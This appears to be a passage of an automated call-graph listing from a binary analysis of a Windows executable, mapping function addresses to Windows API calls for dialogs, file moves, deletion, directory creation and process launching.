26063->26691 26064->26114 26065 7ff7ab4adc2c 33 API calls 26065->26114 26066->26061 26068 7ff7ab4bef36 26067->26068 26074 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26068->26074 26071 7ff7ab491fa0 31 API calls 26071->26114 26072 7ff7ab4a32bc 51 API calls 26072->26114 26073 7ff7ab4a5b60 53 API calls 26073->26114 26076 7ff7ab4bef3c 26074->26076 26075 7ff7ab4bd63c IsDlgButtonChecked 26075->26114 26081 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26076->26081 26077->26043 26077->26045 26083 7ff7ab4bef54 26077->26083 26085 7ff7ab4bef5a 26077->26085 26084 7ff7ab4bef42 26081->26084 26086 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26083->26086 26091 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26084->26091 26089 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26085->26089 26086->26085 26087 7ff7ab4bd95e SHFileOperationW 26087->26114 26089->26055 26090 7ff7ab494228 33 API calls 26090->26114 26093 7ff7ab4bef48 26091->26093 26092 7ff7ab4a32a8 51 API calls 26092->26114 26096 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26093->26096 26094 7ff7ab4a5820 33 API calls 26094->26114 26095 7ff7ab4a5aa8 33 API calls 26095->26114 26098 7ff7ab4bef4e 26096->26098 26097 7ff7ab49250c SetDlgItemTextW 26097->26114 26102 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26098->26102 26099 7ff7ab491150 33 API calls 26099->26114 26102->26083 26103 7ff7ab4b13c4 CompareStringW 26112 7ff7ab4be9d1 26103->26112 26105 7ff7ab491fa0 31 API calls 26105->26112 26106 7ff7ab49129c 33 API calls 26106->26112 26107 7ff7ab492674 31 API calls 26107->26114 26109 7ff7ab49129c 33 API calls 26109->26114 26110 7ff7ab4bdf99 EndDialog 26110->26114 26112->26077 26112->26093 26112->26098 26112->26103 26112->26105 26112->26106 26113 7ff7ab4ad22c 33 API calls 26112->26113 26113->26112 26114->25974 26114->25978 26114->25980 26114->25983 26114->25985 26114->25989 26114->25991 26114->25994 26114->25998 26114->26001 26114->26002 26114->26007 26114->26008 26114->26012 26114->26015 26114->26016 26114->26017 26114->26023 26114->26024 26114->26031 26114->26034 26114->26035 26114->26052 26114->26053 26114->26054 26114->26056 26114->26065 26114->26068 26114->26071 26114->26072 26114->26073 26114->26075 26114->26076 26114->26084 26114->26087 26114->26090 26114->26092 26114->26094 26114->26095 26114->26097 26114->26099 26114->26107 26114->26109 26114->26110 26115 7ff7ab4bdb21 MoveFileW 26114->26115 26119 7ff7ab4a2f58 56 API calls 26114->26119 26120 7ff7ab4920b0 33 API calls 26114->26120 26121 7ff7ab492034 33 API calls 26114->26121 26606 7ff7ab4b13c4 CompareStringW 26114->26606 26646 7ff7ab4acfa4 35 API calls _invalid_parameter_noinfo_noreturn 26114->26646 26647 7ff7ab4b95b4 33 API calls Concurrency::cancel_current_task 26114->26647 26648 7ff7ab4c0684 31 API calls _invalid_parameter_noinfo_noreturn 26114->26648 26649 7ff7ab49df4c 47 API calls memcpy_s 26114->26649 26650 7ff7ab4ba834 33 API calls _invalid_parameter_noinfo_noreturn 26114->26650 26651 7ff7ab4b9518 33 API calls 26114->26651 26652 7ff7ab4ba440 116 API calls 2 library calls 26114->26652 26653 7ff7ab4babe8 33 API calls 3 library calls 26114->26653 26654 7ff7ab4a7368 33 API calls 2 library calls 26114->26654 26655 7ff7ab4a4088 33 API calls 26114->26655 26656 7ff7ab4a65b0 33 API calls 3 library calls 26114->26656 26657 7ff7ab4a72cc 26114->26657 26661 7ff7ab491744 33 API calls 4 library calls 26114->26661 26662 7ff7ab4a31bc 26114->26662 26676 7ff7ab4a3ea0 FindClose 26114->26676 26677 7ff7ab4b13f4 CompareStringW 26114->26677 26678 7ff7ab4b9cd0 47 API calls 26114->26678 26679 7ff7ab4b87d8 51 API calls 3 library calls 26114->26679 26680 7ff7ab4bab54 33 API calls _handle_error 26114->26680 26681 7ff7ab4a7df4 26114->26681 26689 7ff7ab4a5b08 CompareStringW 26114->26689 26690 7ff7ab4a7eb0 47 API calls 26114->26690 26116 7ff7ab4bdb70 26115->26116 26117 7ff7ab4bdb55 MoveFileExW 26115->26117 26116->26114 26118 7ff7ab491fa0 31 API calls 26116->26118 26117->26116 26118->26116 26119->26114 26120->26114 26121->26114 26124 7ff7ab4bf9a3 26123->26124 26125 7ff7ab4920b0 33 API calls 26124->26125 26126 7ff7ab4bf9b9 26125->26126 26127 7ff7ab4bf9ee 26126->26127 26128 7ff7ab4920b0 33 API calls 26126->26128 26721 7ff7ab49e34c 26127->26721 26128->26127 26130 7ff7ab4bfa4b 26741 7ff7ab49e7a8 26130->26741 26134 7ff7ab4bfa61 26135 7ff7ab4c2320 _handle_error 8 API calls 26134->26135 26136 7ff7ab4bbc52 26135->26136 26136->25774 27801 7ff7ab4b849c 26137->27801 26140 7ff7ab4bf4b7 26142 7ff7ab4c2320 _handle_error 8 API calls 26140->26142 26141 7ff7ab4bf3c7 GetWindow 26146 7ff7ab4bf3e2 26141->26146 26143 7ff7ab4bbe9b 26142->26143 26143->25537 26143->25538 26144 7ff7ab4bf3ee GetClassNameW 27806 7ff7ab4b13c4 CompareStringW 26144->27806 26146->26140 26146->26144 26147 7ff7ab4bf496 GetWindow 26146->26147 26148 7ff7ab4bf417 GetWindowLongPtrW 26146->26148 26147->26140 26147->26146 26148->26147 26149 7ff7ab4bf429 IsDlgButtonChecked 26148->26149 26149->26147 26150 7ff7ab4bf445 GetObjectW 26149->26150 27807 7ff7ab4b8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26150->27807 26153 7ff7ab4bf461 27808 7ff7ab4b84cc 26153->27808 27812 7ff7ab4b8df4 16 API calls _handle_error 26153->27812 26155 7ff7ab4bf479 IsDlgButtonChecked DeleteObject 26155->26147 26157 7ff7ab4a6300 26156->26157 26162 7ff7ab4a638d 26156->26162 26158 7ff7ab4913a4 33 API calls 26157->26158 26159 7ff7ab4a631b GetCurrentDirectoryW 26158->26159 26160 7ff7ab4a6341 26159->26160 26161 7ff7ab4920b0 33 API calls 26160->26161 26163 7ff7ab4a634f 26161->26163 26162->25549 26163->26162 26164 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26163->26164 26165 7ff7ab4a63a9 26164->26165 26167 7ff7ab492527 26166->26167 26168 7ff7ab49252a SetDlgItemTextW 26166->26168 26167->26168 26169 7ff7ab4fe2db 26168->26169 26170->25558 26172 7ff7ab492513 26171->26172 26173 7ff7ab492516 SetDlgItemTextW 26171->26173 26172->26173 26175 7ff7ab498d34 26174->26175 26181 7ff7ab498de8 26174->26181 26178 7ff7ab498d91 26175->26178 26179 7ff7ab498de3 26175->26179 26182 7ff7ab498d42 memcpy_s 26175->26182 26178->26182 26183 7ff7ab4c21d0 33 API calls 26178->26183 27815 7ff7ab491f80 33 API calls 3 library calls 26179->27815 27816 7ff7ab492004 33 API calls std::_Xinvalid_argument 26181->27816 26182->25574 26183->26182 26184->25584 27817 7ff7ab4ad874 26185->27817 26188->25622 26190 7ff7ab4a32bc 51 API calls 26189->26190 26191 7ff7ab4a32b1 26190->26191 26191->25635 26191->25658 26192->25635 26194 7ff7ab4913a4 33 API calls 26193->26194 26195 7ff7ab4a6489 26194->26195 26196 7ff7ab4a648c GetModuleFileNameW 26195->26196 26199 7ff7ab4a64dc 26195->26199 26197 7ff7ab4a64a7 26196->26197 26198 7ff7ab4a64de 26196->26198 26197->26195 26198->26199 26200 7ff7ab49129c 33 API calls 26199->26200 26202 7ff7ab4a6506 26200->26202 26201 7ff7ab4a653e 26201->25703 26202->26201 26203 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26202->26203 26204 7ff7ab4a6560 26203->26204 26206 7ff7ab4ab932 26205->26206 26207 7ff7ab4ab94f 26205->26207 27851 7ff7ab4ab96c 26206->27851 26207->25716 26210 7ff7ab4920f6 26209->26210 26212 7ff7ab4920cb memcpy_s 26209->26212 27866 7ff7ab491474 33 API calls 3 library calls 26210->27866 26212->25736 26213->25744 26214->25756 26215->25766 26217 7ff7ab4ab9e8 26216->26217 26220 7ff7ab4aba3c 26216->26220 26219 7ff7ab4aba08 GetProcAddressForCaller GetProcAddress 26217->26219 26217->26220 26218 7ff7ab4abaca GetCurrentProcessId 26227 7ff7ab4abaab 26218->26227 26219->26220 26220->26218 26221 7ff7ab4aba6e 26220->26221 26221->26227 27867 7ff7ab49b66c 99 API calls _handle_error 26221->27867 26223 7ff7ab4aba96 27868 7ff7ab49ba50 99 API calls 3 library calls 26223->27868 26225 7ff7ab4aba9e 27869 7ff7ab49b664 RtlPcToFileHeader RaiseException _com_raise_error 26225->27869 26228 7ff7ab4bfbdc 33 API calls 26227->26228 26228->25781 26230 7ff7ab4c3620 26229->26230 26230->25785 26231->25700 26233 7ff7ab491177 26232->26233 26234 7ff7ab492034 33 API calls 26233->26234 26235 7ff7ab491185 memcpy_s 26234->26235 26235->25714 26238 7ff7ab492085 26237->26238 26239 7ff7ab492059 memcpy_s 26237->26239 27870 7ff7ab4915b8 33 API calls 3 library calls 26238->27870 26239->25687 26242 7ff7ab4c2329 26241->26242 26243 7ff7ab4bc350 26242->26243 26244 7ff7ab4c2550 IsProcessorFeaturePresent 26242->26244 26245 7ff7ab4c2568 26244->26245 27871 7ff7ab4c2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26245->27871 26247 7ff7ab4c257b 27872 7ff7ab4c2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26247->27872 27873 7ff7ab4c783c 31 API calls 2 library calls 26250->27873 26252 7ff7ab4c791d 27874 7ff7ab4c7934 16 API calls abort 26252->27874 26255->25742 26258 7ff7ab49e1b2 26256->26258 26257 7ff7ab49e345 27876 7ff7ab492004 33 API calls std::_Xinvalid_argument 26257->27876 26258->26257 26261 7ff7ab49e340 26258->26261 26262 7ff7ab49e2bc 26258->26262 26265 7ff7ab49e1b8 memcpy_s 26258->26265 27875 7ff7ab491f80 33 API calls 3 library calls 26261->27875 26264 7ff7ab4c21d0 33 API calls 26262->26264 26262->26265 26264->26265 26265->25809 26266->25833 26267->25860 26293 7ff7ab4a3e28 26268->26293 26272 7ff7ab4aa519 26273 7ff7ab4aa589 26272->26273 26291 7ff7ab4aa56a SetDlgItemTextW 26272->26291 26314 7ff7ab4a9800 26272->26314 26299 7ff7ab4a9408 26273->26299 26276 7ff7ab4aa6f2 GetSystemMetrics GetWindow 26280 7ff7ab4aa821 26276->26280 26281 7ff7ab4aa71d 26276->26281 26277 7ff7ab4aa603 26278 7ff7ab4aa6c2 26277->26278 26279 7ff7ab4aa60c GetWindowLongPtrW 26277->26279 26318 7ff7ab4a95a8 26278->26318 26283 7ff7ab4fe2c0 26279->26283 26282 7ff7ab4c2320 _handle_error 8 API calls 26280->26282 26281->26280 26290 7ff7ab4aa73e GetWindowRect 26281->26290 26292 7ff7ab4aa800 GetWindow 26281->26292 26285 7ff7ab4aa830 26282->26285 26286 7ff7ab4aa6aa GetWindowRect 26283->26286 26285->25873 26286->26278 26289 7ff7ab4aa6e5 SetDlgItemTextW 26289->26276 26290->26281 26291->26272 26292->26280 26292->26281 26294 7ff7ab4a3e4d swprintf 26293->26294 26327 7ff7ab4c9ef0 26294->26327 26297 7ff7ab4b0f68 WideCharToMultiByte 26298 7ff7ab4b0faa 26297->26298 26298->26272 26300 7ff7ab4a95a8 47 API calls 26299->26300 26302 7ff7ab4a944f 26300->26302 26301 7ff7ab4c2320 _handle_error 8 API calls 26303 7ff7ab4a958e GetWindowRect GetClientRect 26301->26303 26304 7ff7ab49129c 33 API calls 26302->26304 26312 7ff7ab4a955a 26302->26312 26303->26276 26303->26277 26305 7ff7ab4a949c 26304->26305 26306 7ff7ab4a95a1 26305->26306 26308 7ff7ab49129c 33 API calls 26305->26308 26307 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26306->26307 26309 7ff7ab4a95a7 26307->26309 26310 7ff7ab4a9514 26308->26310 26311 7ff7ab4a959c 26310->26311 26310->26312 26313 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26311->26313 26312->26301 26313->26306 26315 7ff7ab4a9840 26314->26315 26317 7ff7ab4a9869 26314->26317 26366 7ff7ab4ca270 31 API calls 2 library calls 26315->26366 26317->26272 26319 7ff7ab4a3e28 swprintf 46 API calls 26318->26319 26320 7ff7ab4a95eb 26319->26320 26321 7ff7ab4b0f68 WideCharToMultiByte 26320->26321 26322 7ff7ab4a9603 26321->26322 26323 7ff7ab4a9800 31 API calls 26322->26323 26324 7ff7ab4a961b 26323->26324 26325 7ff7ab4c2320 _handle_error 8 API calls 26324->26325 26326 7ff7ab4a962b 26325->26326 26326->26276 26326->26289 26328 7ff7ab4c9f36 26327->26328 26329 7ff7ab4c9f4e 26327->26329 26354 7ff7ab4cd69c 15 API calls _invalid_parameter_noinfo 26328->26354 26329->26328 26331 7ff7ab4c9f58 26329->26331 26356 7ff7ab4c7ef0 35 API calls 2 library calls 26331->26356 26332 7ff7ab4c9f3b 26355 7ff7ab4c78e4 31 API calls _invalid_parameter_noinfo 26332->26355 26335 7ff7ab4c9f69 memcpy_s 26357 7ff7ab4c7e70 15 API calls _set_fmode 26335->26357 26336 7ff7ab4c2320 _handle_error 8 API calls 26337 7ff7ab4a3e69 26336->26337 26337->26297 26339 7ff7ab4c9fd4 26358 7ff7ab4c82f8 46 API calls 3 library calls 26339->26358 26341 7ff7ab4c9fdd 26342 7ff7ab4ca014 26341->26342 26343 7ff7ab4c9fe5 26341->26343 26345 7ff7ab4ca06c 26342->26345 26346 7ff7ab4ca023 26342->26346 26347 7ff7ab4ca092 26342->26347 26350 7ff7ab4ca01a 26342->26350 26359 7ff7ab4cd90c 26343->26359 26351 7ff7ab4cd90c __free_lconv_mon 15 API calls 26345->26351 26349 7ff7ab4cd90c __free_lconv_mon 15 API calls 26346->26349 26347->26345 26348 7ff7ab4ca09c 26347->26348 26352 7ff7ab4cd90c __free_lconv_mon 15 API calls 26348->26352 26353 7ff7ab4c9f46 26349->26353 26350->26345 26350->26346 26351->26353 26352->26353 26353->26336 26354->26332 26355->26353 26356->26335 26357->26339 26358->26341 26360 7ff7ab4cd911 RtlRestoreThreadPreferredUILanguages 26359->26360 26361 7ff7ab4cd941 __free_lconv_mon 26359->26361 26360->26361 26362 7ff7ab4cd92c 26360->26362 26361->26353 26365 7ff7ab4cd69c 15 API calls _invalid_parameter_noinfo 26362->26365 26364 7ff7ab4cd931 GetLastError 26364->26361 26365->26364 26366->26317 26379 7ff7ab4913a4 26367->26379 26370 7ff7ab492494 26371 7ff7ab49129c 33 API calls 26370->26371 26372 7ff7ab4924a2 26371->26372 26373 7ff7ab4924dd 26372->26373 26376 7ff7ab492505 26372->26376 26374 7ff7ab4c2320 _handle_error 8 API calls 26373->26374 26375 7ff7ab4924f3 26374->26375 26375->25881 26377 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26376->26377 26378 7ff7ab49250a 26377->26378 26380 7ff7ab49142d GetWindowTextW 26379->26380 26381 7ff7ab4913ad 26379->26381 26380->26370 26382 7ff7ab49143d 26381->26382 26383 7ff7ab4913ce 26381->26383 26399 7ff7ab492018 33 API calls std::_Xinvalid_argument 26382->26399 26387 7ff7ab4913db memcpy_s 26383->26387 26389 7ff7ab4c21d0 26383->26389 26398 7ff7ab49197c 31 API calls _invalid_parameter_noinfo_noreturn 26387->26398 26392 7ff7ab4c21db 26389->26392 26390 7ff7ab4c21f4 26390->26387 26392->26390 26393 7ff7ab4c21fa 26392->26393 26400 7ff7ab4cbbc0 26392->26400 26394 7ff7ab4c2205 26393->26394 26403 7ff7ab4c2f7c RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 26393->26403 26404 7ff7ab491f80 33 API calls 3 library calls 26394->26404 26397 7ff7ab4c220b 26398->26380 26405 7ff7ab4cbc00 26400->26405 26403->26394 26404->26397 26410 7ff7ab4cf398 EnterCriticalSection 26405->26410 26418 7ff7ab4a9638 26411->26418 26414 7ff7ab4a97d9 26416 7ff7ab4c2320 _handle_error 8 API calls 26414->26416 26415 7ff7ab4a9800 31 API calls 26415->26414 26417 7ff7ab4a97f2 26416->26417 26417->25895 26417->25896 26419 7ff7ab4a9692 26418->26419 26427 7ff7ab4a9730 26418->26427 26420 7ff7ab4b0f68 WideCharToMultiByte 26419->26420 26423 7ff7ab4a96c0 26419->26423 26420->26423 26421 7ff7ab4c2320 _handle_error 8 API calls 26422 7ff7ab4a9764 26421->26422 26422->26414 26422->26415 26426 7ff7ab4a96ef 26423->26426 26428 7ff7ab4aaa88 45 API calls 2 library calls 26423->26428 26429 7ff7ab4ca270 31 API calls 2 library calls 26426->26429 26427->26421 26428->26426 26429->26427 26430->25900 26433 7ff7ab4bae80 GetDlgItem 26432->26433 26434 7ff7ab4bae3c GetMessageW 26432->26434 26433->25911 26433->25912 26435 7ff7ab4bae6a TranslateMessage DispatchMessageW 26434->26435 26436 7ff7ab4bae5b IsDialogMessageW 26434->26436 26435->26433 26436->26433 26436->26435 26439 7ff7ab4a36b3 26437->26439 26438 7ff7ab4a36e0 26457 7ff7ab4a32bc 26438->26457 26439->26438 26440 7ff7ab4a36cc CreateDirectoryW 26439->26440 26440->26438 26442 7ff7ab4a377d 26440->26442 26444 7ff7ab4a378d 26442->26444 26471 7ff7ab4a3d34 26442->26471 26449 7ff7ab4c2320 _handle_error 8 API calls 26444->26449 26445 7ff7ab4a3791 GetLastError 26445->26444 26452 7ff7ab4a37b9 26449->26452 26450 7ff7ab4a3720 CreateDirectoryW 26451 7ff7ab4a373b 26450->26451 26453 7ff7ab4a3774 26451->26453 26454 7ff7ab4a37ce 26451->26454 26452->25927 26453->26442 26453->26445 26455 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26454->26455 26456 7ff7ab4a37d3 26455->26456 26458 7ff7ab4a32e4 26457->26458 26459 7ff7ab4a32e7 GetFileAttributesW 26457->26459 26458->26459 26460 7ff7ab4a32f8 26459->26460 26461 7ff7ab4a3375 26459->26461 26463 7ff7ab4a6a0c 49 API calls 26460->26463 26462 7ff7ab4c2320 _handle_error 8 API calls 26461->26462 26464 7ff7ab4a3389 26462->26464 26465 7ff7ab4a331f 26463->26465 26464->26445 26485 7ff7ab4a6a0c 26464->26485 26466 7ff7ab4a3323 GetFileAttributesW 26465->26466 26467 7ff7ab4a333c 26465->26467 26466->26467 26467->26461 26468 7ff7ab4a3399 26467->26468 26469 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26468->26469 26470 7ff7ab4a339e 26469->26470 26472 7ff7ab4a3d5b 26471->26472 26473 7ff7ab4a3d5e SetFileAttributesW 26471->26473 26472->26473 26474 7ff7ab4a3d74 26473->26474 26481 7ff7ab4a3df5 26473->26481 26476 7ff7ab4a6a0c 49 API calls 26474->26476 26475 7ff7ab4c2320 _handle_error 8 API calls 26477 7ff7ab4a3e0a 26475->26477 26478 7ff7ab4a3d99 26476->26478 26477->26444 26479 7ff7ab4a3dbc 26478->26479 26480 7ff7ab4a3d9d SetFileAttributesW 26478->26480 26479->26481 26482 7ff7ab4a3e1a 26479->26482 26480->26479 26481->26475 26483 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26482->26483 26484 7ff7ab4a3e1f 26483->26484 26486 7ff7ab4a6a44 26485->26486 26487 7ff7ab4a6a4b 26485->26487 26488 7ff7ab4c2320 _handle_error 8 API calls 26486->26488 26490 7ff7ab49129c 33 API calls 26487->26490 26489 7ff7ab4a371c 26488->26489 26489->26450 26489->26451 26491 7ff7ab4a6a76 26490->26491 26492 7ff7ab4a6a96 26491->26492 26493 7ff7ab4a6cc7 26491->26493 26495 7ff7ab4a6ab0 26492->26495 26496 7ff7ab4a6b49 26492->26496 26494 7ff7ab4a62dc 35 API calls 26493->26494 26498 7ff7ab4a6ce6 26494->26498 26523 7ff7ab4a70ab 26495->26523 26558 7ff7ab49c098 26495->26558 26520 7ff7ab49129c 33 API calls 26496->26520 26556 7ff7ab4a6b44 26496->26556 26497 7ff7ab4a6eef 26505 7ff7ab49c098 33 API calls 26497->26505 26541 7ff7ab4a70cf 26497->26541 26498->26497 26500 7ff7ab4a6d1b 26498->26500 26498->26556 26507 7ff7ab49c098 33 API calls 26500->26507 26534 7ff7ab4a70bd 26500->26534 26501 7ff7ab4a70b1 26508 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26501->26508 26504 7ff7ab4a6b03 26519 7ff7ab491fa0 31 API calls 26504->26519 26521 7ff7ab4a6b15 memcpy_s 26504->26521 26512 7ff7ab4a6f56 26505->26512 26533 7ff7ab4a6d76 memcpy_s 26507->26533 26517 7ff7ab4a70b7 26508->26517 26509 7ff7ab4a70d5 26510 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26509->26510 26518 7ff7ab4a70db 26510->26518 26511 7ff7ab4a70a6 26516 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26511->26516 26575 7ff7ab4911cc 33 API calls memcpy_s 26512->26575 26514 7ff7ab4a70c3 26527 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26514->26527 26515 7ff7ab491fa0 31 API calls 26515->26556 26516->26523 26528 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26517->26528 26524 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26518->26524 26519->26521 26525 7ff7ab4a6bbe 26520->26525 26521->26515 26522 7ff7ab4a6f69 26576 7ff7ab4a57ac 33 API calls memcpy_s 26522->26576 26577 7ff7ab492004 33 API calls std::_Xinvalid_argument 26523->26577 26530 7ff7ab4a70e1 26524->26530 26566 7ff7ab4a5820 26525->26566 26532 7ff7ab4a70c9 26527->26532 26528->26534 26529 7ff7ab491fa0 31 API calls 26539 7ff7ab4a6df5 26529->26539 26579 7ff7ab49704c 47 API calls memcpy_s 26532->26579 26533->26514 26533->26529 26578 7ff7ab492004 33 API calls std::_Xinvalid_argument 26534->26578 26536 7ff7ab49e164 33 API calls 26551 7ff7ab4a6be9 memcpy_s 26536->26551 26538 7ff7ab491fa0 31 API calls 26542 7ff7ab4a6fec 26538->26542 26544 7ff7ab4a6e21 26539->26544 26574 7ff7ab491744 33 API calls 4 library calls 26539->26574 26540 7ff7ab4a6f79 memcpy_s 26540->26518 26540->26538 26580 7ff7ab492004 33 API calls std::_Xinvalid_argument 26541->26580 26543 7ff7ab491fa0 31 API calls 26542->26543 26546 7ff7ab4a6ff6 26543->26546 26544->26532 26550 7ff7ab49129c 33 API calls 26544->26550 26545 7ff7ab491fa0 31 API calls 26548 7ff7ab4a6c6d 26545->26548 26549 7ff7ab491fa0 31 API calls 26546->26549 26552 7ff7ab491fa0 31 API calls 26548->26552 26549->26556 26553 7ff7ab4a6ec2 26550->26553 26551->26517 26551->26545 26552->26556 26554 7ff7ab492034 33 API calls 26553->26554 26555 7ff7ab4a6edf 26554->26555 26557 7ff7ab491fa0 31 API calls 26555->26557 26556->26486 26556->26501 26556->26509 26556->26511 26557->26556 26559 7ff7ab49c0e5 26558->26559 26560 7ff7ab49c0fa memcpy_s 26558->26560 26559->26560 26561 7ff7ab49c1a5 26559->26561 26562 7ff7ab49c12c 26559->26562 26560->26504 26581 7ff7ab491f80 33 API calls 3 library calls 26561->26581 26562->26560 26565 7ff7ab4c21d0 33 API calls 26562->26565 26564 7ff7ab49c1aa 26565->26560 26567 7ff7ab4a5849 26566->26567 26568 7ff7ab4a585b 26567->26568 26569 7ff7ab4a589e 26567->26569 26571 7ff7ab49c098 33 API calls 26568->26571 26582 7ff7ab492004 33 API calls std::_Xinvalid_argument 26569->26582 26573 7ff7ab4a5886 26571->26573 26573->26536 26574->26544 26575->26522 26576->26540 26579->26541 26581->26564 26584 7ff7ab497206 26583->26584 26585 7ff7ab49713b 26583->26585 26593 7ff7ab49704c 47 API calls memcpy_s 26584->26593 26591 7ff7ab49714b memcpy_s 26585->26591 26592 7ff7ab493f48 33 API calls 2 library calls 26585->26592 26588 7ff7ab497273 26588->25946 26589 7ff7ab49720b 26589->26588 26594 7ff7ab49889c 8 API calls memcpy_s 26589->26594 26591->25946 26592->26591 26593->26589 26594->26589 26596 7ff7ab4a2102 26595->26596 26597 7ff7ab4a20ea 26595->26597 26598 7ff7ab4a2126 26596->26598 26601 7ff7ab49b544 99 API calls 26596->26601 26597->26596 26599 7ff7ab4a20f6 FindCloseChangeNotification 26597->26599 26598->25969 26599->26596 26601->26598 26603 7ff7ab4baa2f 26602->26603 26604 7ff7ab4baa36 26602->26604 26603->26114 26604->26603 26706 7ff7ab491744 33 API calls 4 library calls 26604->26706 26606->26114 26612 7ff7ab4bf529 memcpy_s 26607->26612 26626 7ff7ab4bf87d 26607->26626 26608 7ff7ab491fa0 31 API calls 26609 7ff7ab4bf89c 26608->26609 26610 7ff7ab4c2320 _handle_error 8 API calls 26609->26610 26611 7ff7ab4bf8a8 26610->26611 26611->26061 26613 7ff7ab4bf684 26612->26613 26713 7ff7ab4b13c4 CompareStringW 26612->26713 26615 7ff7ab49129c 33 API calls 26613->26615 26616 7ff7ab4bf6c0 26615->26616 26617 7ff7ab4a32a8 51 API calls 26616->26617 26618 7ff7ab4bf6ca 26617->26618 26619 7ff7ab491fa0 31 API calls 26618->26619 26623 7ff7ab4bf6d5 26619->26623 26620 7ff7ab4bf742 ShellExecuteExW 26621 7ff7ab4bf846 26620->26621 26622 7ff7ab4bf755 26620->26622 26621->26626 26631 7ff7ab4bf8fb 26621->26631 26624 7ff7ab4bf774 IsWindowVisible 26622->26624 26625 7ff7ab4bf78e WaitForInputIdle 26622->26625 26628 7ff7ab4bf7e3 CloseHandle 26622->26628 26623->26620 26627 7ff7ab49129c 33 API calls 26623->26627 26624->26625 26629 7ff7ab4bf781 ShowWindow 26624->26629 26707 7ff7ab4bfe24 26625->26707 26626->26608 26632 7ff7ab4bf717 26627->26632 26636 7ff7ab4bf7f2 26628->26636 26637 7ff7ab4bf801 26628->26637 26629->26625 26634 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26631->26634 26714 7ff7ab4a5b60 53 API calls 2 library calls 26632->26714 26633 7ff7ab4bf7a6 26633->26628 26641 7ff7ab4bf7b4 GetExitCodeProcess 26633->26641 26638 7ff7ab4bf900 26634->26638 26715 7ff7ab4b13c4 CompareStringW 26636->26715 26637->26621 26643 7ff7ab4bf837 ShowWindow 26637->26643 26639 7ff7ab4bf725 26642 7ff7ab491fa0 31 API calls 26639->26642 26641->26628 26644 7ff7ab4bf7c7 26641->26644 26645 7ff7ab4bf72f 26642->26645 26643->26621 26644->26628 26645->26620 26646->26114 26647->26114 26648->26114 26649->26114 26650->26114 26651->26114 26652->26050 26653->26114 26654->26114 26655->26114 26656->26114 26658 7ff7ab4a72ea 26657->26658 26716 7ff7ab49b3a8 26658->26716 26661->26087 26663 7ff7ab4a31e4 26662->26663 26664 7ff7ab4a31e7 DeleteFileW 26662->26664 26663->26664 26665 7ff7ab4a31fd 26664->26665 26672 7ff7ab4a327c 26664->26672 26666 7ff7ab4a6a0c 49 API calls 26665->26666 26668 7ff7ab4a3222 26666->26668 26667 7ff7ab4c2320 _handle_error 8 API calls 26669 7ff7ab4a3291 26667->26669 26670 7ff7ab4a3243 26668->26670 26671 7ff7ab4a3226 DeleteFileW 26668->26671 26669->26114 26670->26672 26673 7ff7ab4a32a1 26670->26673 26671->26670 26672->26667 26674 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26673->26674 26675 7ff7ab4a32a6 26674->26675 26677->26114 26678->26114 26679->26114 26680->26114 26682 7ff7ab4a7e0c 26681->26682 26683 7ff7ab4a7e23 26682->26683 26684 7ff7ab4a7e55 26682->26684 26686 7ff7ab49129c 33 API calls 26683->26686 26720 7ff7ab49704c 47 API calls memcpy_s 26684->26720 26688 7ff7ab4a7e47 26686->26688 26687 7ff7ab4a7e5a 26688->26114 26689->26114 26690->26114 26694 7ff7ab4ad25e 26691->26694 26692 7ff7ab4ad292 26692->26112 26693 7ff7ab491744 33 API calls 26693->26694 26694->26692 26694->26693 26695->26010 26696->25997 26698->25980 26699->25983 26700->25985 26701->26039 26702->26026 26704->26028 26706->26604 26708 7ff7ab4bfe77 WaitForSingleObject 26707->26708 26709 7ff7ab4bfe2f PeekMessageW 26708->26709 26710 7ff7ab4bfe89 26708->26710 26711 7ff7ab4bfe74 26709->26711 26712 7ff7ab4bfe4b GetMessageW TranslateMessage DispatchMessageW 26709->26712 26710->26633 26711->26708 26712->26711 26713->26613 26714->26639 26715->26637 26719 7ff7ab49b3f2 memcpy_s 26716->26719 26717 7ff7ab4c2320 _handle_error 8 API calls 26718 7ff7ab49b4b6 26717->26718 26718->26114 26719->26717 26720->26687 26777 7ff7ab4a86ec 26721->26777 26723 7ff7ab49e3c4 26783 7ff7ab49e600 26723->26783 26725 7ff7ab49e4d4 26726 7ff7ab4c21d0 33 API calls 26725->26726 26729 7ff7ab49e4f0 26726->26729 26727 7ff7ab49e549 26730 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26727->26730 26728 7ff7ab49e454 26728->26725 26728->26727 26789 7ff7ab4b3148 102 API calls 26729->26789 26733 7ff7ab49e54e 26730->26733 26732 7ff7ab49e51d 26734 7ff7ab4c2320 _handle_error 8 API calls 26732->26734 26736 7ff7ab4a18c2 26733->26736 26738 7ff7ab491fa0 31 API calls 